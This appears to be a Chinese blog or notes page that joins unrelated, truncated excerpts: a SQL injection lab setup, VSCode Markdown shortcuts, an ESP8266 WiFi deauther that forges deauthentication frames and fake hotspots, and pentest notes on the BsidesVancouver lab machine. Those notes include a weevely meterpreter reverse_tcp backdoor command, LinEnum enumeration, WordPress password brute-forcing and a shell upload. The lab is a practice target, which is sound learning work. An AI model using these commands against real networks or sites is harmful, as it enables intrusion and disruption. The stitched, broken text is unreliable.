环境搭建

用于SQL注入学习环境

1. 关卡源码下载地址，美化页面下载地址，
2. 用phpstudy或者web环境直接搭建运行

第一关 基于错误的GET单引号字符型注入

可以用Vscode做一些很酷的事情

Vscode 结合Github

Vscode 结合Markdown编写

Markdown Shortcuts

• 提供了大量的markdown快捷键。包括如下特性：

• 快速创建有序(ctrl m ctrl 1)或无需列表(ctrl m ctrl b)

• 便捷地生成URL(ctrl l)

• 将类似于表格的内容转换成表格, 或生成一个用于填充的表格(Add table)

• 插入代码，行内代码ctrl+M ctrl+I, 代码块ctrl+M ctrl+C

• 加粗ctrl +B 斜体ctrl + I

• 加入检查盒(check box)

• 最后，使用ctrl+m ctrl+m显示可用命令。

Vscode简介

VSCode(Visual Studio Code):它是一个免费的，开源的跨平台编辑器。之所以强调‘编辑器’，可能是VSCode并无意成为一个全尺寸的集成开发环境，也就是IDE。它是由Erich Gamma把Monaco Editor移植到桌面平台上，成为了现今的VSCode. 下载地址

配置python设置

1. 下载python,下载地址,添加python进入系统环境变量
   

ESP8826简介

制作WIFI Deauther

esp8266_deauther项目地址
可以通过网页或者手动选择，发现对wifi的攻击、生成热点等功能

原理

是通过发送取消认证报文让客户端以为路由器需要让自己断开连接从而断开wifi，伪造路由器向客户端发送取消认证报文，使客户端主动断开wifi连接。并且支持自定义热点伪造（批量生成假Wi-Fi信号）

缺点

1. 只不过散热非常差，长时间运行担忧啊
2. 由于esp8266只支持802.11bgn,所以以下实验只针对2.4GWiFi测试。不支持5GWi-Fi！

BsidesVancouver靶机渗透

靶机下载地址

笔记起来

1. dirb 进行目录扫描尽量使用大字典 big.txt
2. 对于wordpress 可以用wordscan进行用户名识别再进行密码爆破
3. 对于wordpress 进入后台后可以利用

4. 用weevely生成的马可以反向连接msf

   1	:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.2.112

5. 在靶机中执行LinEnum.git程序可以在低权限获取系统敏感信息

   1 2	git clone https://github.com/rebootuser/LinEnum.git ./LinEnum.sh

6. 进入wordpress后台后难以找到上传点时可以用msf的wp_admin_shell_upload模块直接弹shell